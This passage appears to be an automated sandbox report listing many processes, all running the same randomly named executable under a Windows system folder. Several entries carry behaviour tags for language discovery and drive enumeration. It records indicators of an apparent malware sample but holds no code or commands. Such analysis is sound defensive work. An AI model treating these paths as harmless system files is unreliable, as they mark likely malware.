110 | PID:1744 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
111 | PID:2392 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
112 | PID:1724 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
113 | PID:1324 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
114 | PID:3076 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
115 | PID:3092 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
116 | PID:3108 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
- System Location Discovery: System Language Discovery
117 | PID:3124 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
118 | PID:3144 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
- System Location Discovery: System Language Discovery
119 | PID:3156 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
120 | PID:3168 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
- System Location Discovery: System Language Discovery
121 | PID:3180 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe
- Enumerates connected drives
122 | PID:3192 | C:\Windows\SysWOW64\v7Fqtqd\sUUAXgs.exe | C:\Windows\system32\v7Fqtqd\sUUAXgs.exe